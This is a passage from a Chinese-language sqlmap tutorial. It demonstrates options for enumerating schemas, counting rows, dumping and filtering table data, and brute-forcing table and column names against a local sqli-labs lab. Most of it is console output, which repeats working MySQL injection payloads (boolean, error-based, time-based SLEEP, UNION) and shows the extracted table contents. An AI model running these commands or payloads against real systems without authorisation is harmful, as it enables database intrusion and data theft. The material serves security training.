Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[08:56:31] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[08:56:31] [INFO] fetching tables for database: 'demo1125'
[08:56:31] [INFO] resumed: 'areas'
[08:56:31] [INFO] resumed: 'cities'
[08:56:31] [INFO] resumed: 'classes'
[08:56:31] [INFO] resumed: 'provinces'
[08:56:31] [INFO] resumed: 'student'
[08:56:31] [INFO] resumed: 'v_p_c'
Database: demo1125
[6 tables]
+-----------+
| areas |
| cities |
| classes |
| provinces |
| student |
| v_p_c |
+-----------+
[08:56:31] [INFO] fetching columns for table 'student' in database 'demo1125'
[08:56:31] [INFO] resumed: 'sid','int(4)'
[08:56:31] [INFO] resumed: 'sname','varchar(36)'
[08:56:31] [INFO] resumed: 'gid','int(4)'
Database: demo1125
Table: student
[3 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| gid | int(4) |
| sid | int(4) |
| sname | varchar(36) |
+--------+-------------+
[08:56:31] [INFO] fetching columns for table 'student' in database 'demo1125'
[08:56:31] [INFO] resumed: 'sid','int(4)'
[08:56:31] [INFO] resumed: 'sname','varchar(36)'
[08:56:31] [INFO] resumed: 'gid','int(4)'
[08:56:31] [INFO] fetching entries for table 'student' in database 'demo1125'
[08:56:31] [INFO] retrieved: '1','3','Jack'
[08:56:31] [INFO] retrieved: '1','4','Jack'
[08:56:31] [INFO] retrieved: '1','5','Jack'
[08:56:31] [INFO] retrieved: '1','8','Jack'
[08:56:31] [INFO] retrieved: '1','9','Jack'
[08:56:32] [INFO] retrieved: '1','10','Jackson'
[08:56:32] [INFO] retrieved: '1','22','Jack'
[08:56:32] [INFO] retrieved: '1','26','Tom'
[08:56:32] [INFO] retrieved: '1','27','Tommy'
Database: demo1125
Table: student
[9 entries]
+-----+-----+---------+
| gid | sid | sname |
+-----+-----+---------+
| 1 | 3 | Jack |
| 1 | 4 | Jack |
| 1 | 5 | Jack |
| 1 | 8 | Jack |
| 1 | 9 | Jack |
| 1 | 10 | Jackson |
| 1 | 22 | Jack |
| 1 | 26 | Tom |
| 1 | 27 | Tommy |
+-----+-----+---------+
[08:56:32] [INFO] table 'demo1125.student' dumped to CSV file 'xxxx\sqlmap\output\127.0.0.1\dump\demo1125\student.csv'
[08:56:32] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:56:32 /2020-03-02/
显然,探测出了表的具体数据。
5.sqlmap枚举schema信息
参数:
--schema
用户可用此选项列举数据库管理系统的模式,模式列表包含所有数据库、表、列、触发器和他们各自的类型;
可使用参数--exclude-sysdbs排除系统数据库。
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --schema
显示:
sqlmap--schema
结果包含了所有数据库、数据库中的表和表中的字段等,但是不包括数据。
显然,这个过程很费时,因为包含了很多系统表,进行了意义不大的探测。
增加--exclude-sysdbs参数排除系统表再次测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --schema --exclude-sysdbs
显示:
显然,这个过程短得多。
6.sqlmap检索数据表数量
参数:
--count
如果用户只想知道表的条目数,则可以使用此参数。
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --count -D demo1125
打印:
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:12:39 /2020-03-02/
[09:12:40] [INFO] resuming back-end DBMS 'mysql'
[09:12:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[09:12:40] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[09:12:40] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[09:12:40] [INFO] fetching tables for database: 'demo1125'
[09:12:40] [INFO] resumed: 'areas'
[09:12:40] [INFO] resumed: 'cities'
[09:12:40] [INFO] resumed: 'classes'
[09:12:40] [INFO] resumed: 'provinces'
[09:12:40] [INFO] resumed: 'student'
[09:12:40] [INFO] resumed: 'v_p_c'
Database: demo1125
+-----------+---------+
| Table | Entries |
+-----------+---------+
| areas | 3409 |
| cities | 345 |
| provinces | 34 |
| v_p_c | 14 |
| student | 9 |
+-----------+---------+
[09:12:40] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 09:12:40 /2020-03-02/
可以探测一个数据库中每个表的记录数。
7.sqlmap截取数据信息
参数:
--start和--stop
例如--start 1 --stop 3返回当前数据库表的前三条记录。
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D demo1125 --tables --start 1 --stop 3 --dump
打印:
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:16:35 /2020-03-02/
[09:16:36] [INFO] resuming back-end DBMS 'mysql'
[09:16:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[09:16:36] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[09:16:36] [INFO] fetching tables for database: 'demo1125'
[09:16:36] [INFO] resumed: 'areas'
[09:16:36] [INFO] resumed: 'cities'
[09:16:36] [INFO] resumed: 'classes'
[09:16:36] [INFO] resumed: 'provinces'
[09:16:36] [INFO] resumed: 'student'
[09:16:36] [INFO] resumed: 'v_p_c'
Database: demo1125
[6 tables]
+-----------+
| areas |
| cities |
| classes |
| provinces |
| student |
| v_p_c |
+-----------+
[09:16:36] [INFO] fetching columns for table 'areas' in database 'demo1125'
[09:16:36] [INFO] resumed: 'id','int(5) unsigned'
[09:16:36] [INFO] resumed: 'pid','int(5) unsigned'
[09:16:36] [INFO] resumed: 'name','varchar(120)'
[09:16:36] [INFO] resumed: 'type','tinyint(1)'
[09:16:36] [INFO] fetching entries for table 'areas' in database 'demo1125'
[09:16:36] [INFO] retrieved: '1','中国','0','0'
[09:16:36] [INFO] retrieved: '2','北京','1','1'
[09:16:36] [INFO] retrieved: '3','安徽','1','1'
Database: demo1125
Table: areas
[3 entries]
+----+-----+------+------+
| id | pid | name | type |
+----+-----+------+------+
| 1 | 0 | 中国 | 0 |
| 2 | 1 | 北京 | 1 |
| 3 | 1 | 安徽 | 1 |
+----+-----+------+------+
[09:16:36] [INFO] table 'demo1125.areas' dumped to CSV file 'xxxx\sqlmap\output\127.0.0.1\dump\demo1125\areas.csv'
[09:16:36] [INFO] fetching columns for table 'cities' in database 'demo1125'
[09:16:36] [INFO] resumed: 'id','int(11)'
[09:16:36] [INFO] resumed: 'cityid','char(6)'
[09:16:36] [INFO] resumed: 'city','varchar(40)'
[09:16:36] [INFO] resumed: 'provinceid','char(6)'
[09:16:36] [INFO] fetching entries for table 'cities' in database 'demo1125'
[09:16:36] [INFO] retrieved: '北京市','110100','1','110000'
[09:16:36] [INFO] retrieved: '北京下属县','1102xx','2','1100xx'
[09:16:36] [INFO] retrieved: '天津市','120100','3','120000'
Database: demo1125
Table: cities
[3 entries]
+----+--------+------------+------------+
| id | cityid | provinceid | city |
+----+--------+------------+------------+
| 1 | 110100 | 110000 | 北京市 |
| 2 | 1102xx | 1100xx | 北京下属县 |
| 3 | 120100 | 120000 | 天津市 |
+----+--------+------------+------------+
[09:16:36] [INFO] table 'demo1125.cities' dumped to CSV file 'xxxx\sqlmap\output\127.0.0.1\dump\demo1125\cities.csv'
[09:16:36] [INFO] fetching columns for table 'classes' in database 'demo1125'
[09:16:36] [INFO] resumed: 'id','int(4)'
[09:16:36] [INFO] resumed: 'name','varchar(36)'
[09:16:36] [INFO] fetching entries for table 'classes' in database 'demo1125'
[09:16:36] [INFO] fetching number of entries for table 'classes' in database 'demo1125'
[09:16:36] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:16:36] [INFO] retrieved: 0
[09:16:36] [WARNING] table 'classes' in database 'demo1125' appears to be empty
Database: demo1125
Table: classes
[0 entries]
+----+------+
| id | name |
+----+------+
+----+------+
[09:16:36] [INFO] table 'demo1125.classes' dumped to CSV file 'xxxx\sqlmap\output\127.0.0.1\dump\demo1125\classes.csv'
[09:16:36] [INFO] fetching columns for table 'provinces' in database 'demo1125'
[09:16:36] [INFO] resumed: 'id','int(11)'
[09:16:36] [INFO] resumed: 'provinceid','int(11)'
[09:16:36] [INFO] resumed: 'province','varchar(100)'
[09:16:36] [INFO] fetching entries for table 'provinces' in database 'demo1125'
[09:16:36] [INFO] retrieved: '1','北京市','110000'
[09:16:36] [INFO] retrieved: '2','天津市','120000'
[09:16:36] [INFO] retrieved: '3','河北省','130000'
Database: demo1125
Table: provinces
[3 entries]
+----+------------+----------+
| id | provinceid | province |
+----+------------+----------+
| 1 | 110000 | 北京市 |
| 2 | 120000 | 天津市 |
| 3 | 130000 | 河北省 |
+----+------------+----------+
[09:16:36] [INFO] table 'demo1125.provinces' dumped to CSV file 'xxxx\sqlmap\output\127.0.0.1\dump\demo1125\provinces.csv'
[09:16:36] [INFO] fetching columns for table 'student' in database 'demo1125'
[09:16:36] [INFO] resumed: 'sid','int(4)'
[09:16:36] [INFO] resumed: 'sname','varchar(36)'
[09:16:36] [INFO] resumed: 'gid','int(4)'
[09:16:36] [INFO] fetching entries for table 'student' in database 'demo1125'
[09:16:36] [INFO] resumed: '1','3','Jack'
[09:16:36] [INFO] resumed: '1','4','Jack'
[09:16:36] [INFO] resumed: '1','5','Jack'
Database: demo1125
Table: student
[3 entries]
+-----+-----+-------+
| gid | sid | sname |
+-----+-----+-------+
| 1 | 3 | Jack |
| 1 | 4 | Jack |
| 1 | 5 | Jack |
+-----+-----+-------+
[09:16:36] [INFO] table 'demo1125.student' dumped to CSV file 'xxxx\sqlmap\output\127.0.0.1\dump\demo1125\student.csv'
[09:16:36] [INFO] fetching columns for table 'v_p_c' in database 'demo1125'
[09:16:36] [INFO] resumed: 'id','int(5) unsigned'
[09:16:36] [INFO] resumed: 'pid','int(5) unsigned'
[09:16:36] [INFO] resumed: 'name','varchar(120)'
[09:16:36] [INFO] resumed: 'type','tinyint(1)'
[09:16:36] [INFO] resumed: 'cname','varchar(120)'
[09:16:36] [INFO] fetching entries for table 'v_p_c' in database 'demo1125'
[09:16:37] [INFO] retrieved: '长沙','14','湖南','1','1'
[09:16:37] [INFO] retrieved: '张家界','14','湖南','1','1'
[09:16:37] [INFO] retrieved: '常德','14','湖南','1','1'
Database: demo1125
Table: v_p_c
[3 entries]
+----+-----+------+------+--------+
| id | pid | name | type | cname |
+----+-----+------+------+--------+
| 14 | 1 | 湖南 | 1 | 长沙 |
| 14 | 1 | 湖南 | 1 | 张家界 |
| 14 | 1 | 湖南 | 1 | 常德 |
+----+-----+------+------+--------+
[09:16:37] [INFO] table 'demo1125.v_p_c' dumped to CSV file 'xxxx\sqlmap\output\127.0.0.1\dump\demo1125\v_p_c.csv'
[09:16:37] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 09:16:37 /2020-03-02/
显然,当表中数据少于3条时,部分显示或不显示,当不少于3条时显示第1-3条数据。
和--start和--stop类似,还可以使用--first和--end参数来获取字段中第几个字符到第几个字符的内容。
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D demo1125 --tables -T v_p_c --first 3 --last 5 --dump
打印:
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:45:23 /2020-03-02/
[09:45:23] [INFO] resuming back-end DBMS 'mysql'
[09:45:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[09:45:23] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[09:45:23] [INFO] fetching tables for database: 'demo1125'
[09:45:23] [INFO] resumed: 'areas'
[09:45:23] [INFO] resumed: 'cities'
[09:45:23] [INFO] resumed: 'classes'
[09:45:23] [INFO] resumed: 'provinces'
[09:45:23] [INFO] resumed: 'student'
[09:45:23] [INFO] resumed: 'v_p_c'
Database: demo1125
[6 tables]
+-----------+
| areas |
| cities |
| classes |
| provinces |
| student |
| v_p_c |
+-----------+
[09:45:23] [INFO] fetching columns for table 'v_p_c' in database 'demo1125'
[09:45:23] [INFO] resumed: 'id','int(5) unsigned'
[09:45:23] [INFO] resumed: 'pid','int(5) unsigned'
[09:45:23] [INFO] resumed: 'name','varchar(120)'
[09:45:23] [INFO] resumed: 'type','tinyint(1)'
[09:45:23] [INFO] resumed: 'cname','varchar(120)'
[09:45:23] [INFO] fetching entries for table 'v_p_c' in database 'demo1125'
[09:45:23] [INFO] resumed: '长沙','14','湖南','1','1'
[09:45:23] [INFO] resumed: '张家界','14','湖南','1','1'
[09:45:24] [INFO] resumed: '常德','14','湖南','1','1'
[09:45:24] [INFO] resumed: '郴州','14','湖南','1','1'
[09:45:24] [INFO] resumed: '衡阳','14','湖南','1','1'
[09:45:24] [INFO] resumed: '怀化','14','湖南','1','1'
[09:45:24] [INFO] resumed: '娄底','14','湖南','1','1'
[09:45:24] [INFO] resumed: '邵阳','14','湖南','1','1'
[09:45:24] [INFO] resumed: '湘潭','14','湖南','1','1'
[09:45:24] [INFO] resumed: '湘西','14','湖南','1','1'
[09:45:24] [INFO] resumed: '益阳','14','湖南','1','1'
[09:45:24] [INFO] resumed: '永州','14','湖南','1','1'
[09:45:24] [INFO] resumed: '岳阳','14','湖南','1','1'
[09:45:24] [INFO] resumed: '株洲','14','湖南','1','1'
Database: demo1125
Table: v_p_c
[14 entries]
+----+-----+------+------+--------+
| id | pid | name | type | cname |
+----+-----+------+------+--------+
| 14 | 1 | 湖南 | 1 | 长沙 |
| 14 | 1 | 湖南 | 1 | 张家界 |
| 14 | 1 | 湖南 | 1 | 常德 |
| 14 | 1 | 湖南 | 1 | 郴州 |
| 14 | 1 | 湖南 | 1 | 衡阳 |
| 14 | 1 | 湖南 | 1 | 怀化 |
| 14 | 1 | 湖南 | 1 | 娄底 |
| 14 | 1 | 湖南 | 1 | 邵阳 |
| 14 | 1 | 湖南 | 1 | 湘潭 |
| 14 | 1 | 湖南 | 1 | 湘西 |
| 14 | 1 | 湖南 | 1 | 益阳 |
| 14 | 1 | 湖南 | 1 | 永州 |
| 14 | 1 | 湖南 | 1 | 岳阳 |
| 14 | 1 | 湖南 | 1 | 株洲 |
+----+-----+------+------+--------+
[09:45:24] [INFO] table 'demo1125.v_p_c' dumped to CSV file 'xxxx\sqlmap\output\127.0.0.1\dump\demo1125\v_p_c.csv'
[09:45:24] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 09:45:24 /2020-03-02/
从结果看并无明显不同,这是因为--first与--last参数只在盲注的时候使用,因为其他方式可以准确获取注入内容,不需要一个字符一个字符地猜解。
8.sqlmap设置条件获取信息
参数:
--where
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D demo1125 --tables -T v_p_c --where="id>5" --dump
打印:
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:49:59 /2020-03-02/
[09:50:00] [INFO] resuming back-end DBMS 'mysql'
[09:50:00] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[09:50:00] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[09:50:00] [INFO] fetching tables for database: 'demo1125'
[09:50:00] [INFO] resumed: 'areas'
[09:50:00] [INFO] resumed: 'cities'
[09:50:00] [INFO] resumed: 'classes'
[09:50:00] [INFO] resumed: 'provinces'
[09:50:00] [INFO] resumed: 'student'
[09:50:00] [INFO] resumed: 'v_p_c'
Database: demo1125
[6 tables]
+-----------+
| areas |
| cities |
| classes |
| provinces |
| student |
| v_p_c |
+-----------+
[09:50:00] [INFO] fetching columns for table 'v_p_c' in database 'demo1125'
[09:50:00] [INFO] resumed: 'id','int(5) unsigned'
[09:50:00] [INFO] resumed: 'pid','int(5) unsigned'
[09:50:00] [INFO] resumed: 'name','varchar(120)'
[09:50:00] [INFO] resumed: 'type','tinyint(1)'
[09:50:00] [INFO] resumed: 'cname','varchar(120)'
[09:50:00] [INFO] fetching entries for table 'v_p_c' in database 'demo1125'
[09:50:00] [INFO] retrieved: '长沙','14','湖南','1','1'
[09:50:00] [INFO] retrieved: '张家界','14','湖南','1','1'
[09:50:00] [INFO] retrieved: '常德','14','湖南','1','1'
[09:50:00] [INFO] retrieved: '郴州','14','湖南','1','1'
[09:50:00] [INFO] retrieved: '衡阳','14','湖南','1','1'
[09:50:00] [INFO] retrieved: '怀化','14','湖南','1','1'
[09:50:01] [INFO] retrieved: '娄底','14','湖南','1','1'
[09:50:01] [INFO] retrieved: '邵阳','14','湖南','1','1'
[09:50:01] [INFO] retrieved: '湘潭','14','湖南','1','1'
[09:50:01] [INFO] retrieved: '湘西','14','湖南','1','1'
[09:50:01] [INFO] retrieved: '益阳','14','湖南','1','1'
[09:50:01] [INFO] retrieved: '永州','14','湖南','1','1'
[09:50:01] [INFO] retrieved: '岳阳','14','湖南','1','1'
[09:50:01] [INFO] retrieved: '株洲','14','湖南','1','1'
Database: demo1125
Table: v_p_c
[14 entries]
+----+-----+------+------+--------+
| id | pid | name | type | cname |
+----+-----+------+------+--------+
| 14 | 1 | 湖南 | 1 | 长沙 |
| 14 | 1 | 湖南 | 1 | 张家界 |
| 14 | 1 | 湖南 | 1 | 常德 |
| 14 | 1 | 湖南 | 1 | 郴州 |
| 14 | 1 | 湖南 | 1 | 衡阳 |
| 14 | 1 | 湖南 | 1 | 怀化 |
| 14 | 1 | 湖南 | 1 | 娄底 |
| 14 | 1 | 湖南 | 1 | 邵阳 |
| 14 | 1 | 湖南 | 1 | 湘潭 |
| 14 | 1 | 湖南 | 1 | 湘西 |
| 14 | 1 | 湖南 | 1 | 益阳 |
| 14 | 1 | 湖南 | 1 | 永州 |
| 14 | 1 | 湖南 | 1 | 岳阳 |
| 14 | 1 | 湖南 | 1 | 株洲 |
+----+-----+------+------+--------+
[09:50:01] [INFO] table 'demo1125.v_p_c' dumped to CSV file 'xxxx\sqlmap\output\127.0.0.1\dump\demo1125\v_p_c.csv'
[09:50:01] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 09:50:01 /2020-03-02/
9.sqlmap暴力破解数据
暴力破解表名
参数:
--common-tables
有些情况下用--tables不能列出数据库中表名来比如:
- 版本小于5.0的MySQL没有information_schema表
- 数据库用户权限过低无法读取表名
此时需要暴力破解。
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -common-tables
打印:
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:57:11 /2020-03-02/
[09:57:11] [INFO] resuming back-end DBMS 'mysql'
[09:57:11] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[09:57:11] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[09:57:11] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
which common tables (wordlist) file do you want to use?
[1] default 'xxxxx\sqlmapproject-sqlmap-0605f14\data\txt\common-tables.txt' (press Enter)
[2] custom
>
[09:57:14] [INFO] performing table existence using items from 'xxxxx\sqlmapproject-sqlmap-0605f14\data\txt\common-tables.txt'
[09:57:14] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 5
[09:57:17] [INFO] starting 5 threads
[09:57:17] [INFO] retrieved: users
Current database
[1 table]
+-------+
| users |
+-------+
[09:59:04] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 09:59:05 /2020-03-02/
探测出当前数据库中的一个表users,这可能是因为sqlmap自带的common-tables文件中只含有users表。
暴力破解列名
参数:
--common-columns
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D demo1125 -T student --common-columns
打印:
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:22:16 /2020-03-02/
[13:22:17] [INFO] resuming back-end DBMS 'mysql'
[13:22:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0
x71786a7071)-- -
---
[13:22:17] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[13:22:17] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
which common columns (wordlist) file do you want to use?
[1] default 'xxxxx\sqlmapproject-sqlmap-0605f14\data\txt\common-columns.txt' (press Enter)
[2] custom
>
[13:22:18] [INFO] checking column existence using items from 'xxxxx\sqlmapproject-sqlmap-0605f14\data\txt\common-columns.txt'
[13:22:18] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 10
[13:22:23] [INFO] starting 10 threads
[13:22:24] [INFO] retrieved: sid
[13:22:29] [INFO] retrieved: sname
[13:22:31] [INFO] retrieved: gid
Database: demo1125
Table: student
[3 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| gid | numeric |
| sid | numeric |
| sname | non-numeric |
+--------+-------------+
[13:23:24] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 13:23:24 /2020-03-02/
10.sqlmap检索所有信息
参数:
-a或者--all
返回所有的检索信息。
进行测试:
